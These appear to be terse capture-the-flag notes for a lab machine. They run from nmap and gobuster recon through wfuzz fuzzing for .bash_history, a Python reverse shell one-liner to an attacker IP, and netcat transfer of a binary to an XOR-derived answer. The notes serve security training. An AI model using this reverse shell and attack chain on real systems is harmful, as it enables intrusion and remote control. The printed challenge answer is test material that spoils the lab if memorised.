nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -u http://$VICTIM:5000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
console is locked by a pin, we will have to come back to it.
wfuzz -c -f bookstore.txt -u "http://10.10.237.140:5000/api/v1/resources/books?FUZZ=.bash_history" -w /usr/share/wordlists/SecLis
ts/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.43.15",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
nc -l -p 1234 > try-harder
nc -w 3 $KALI 1234 < try-harder
We find how the magic number is made.
python
1573724660 ^ 0x5db3 ^ 0x1116
./try-harder
Answer: 1573743953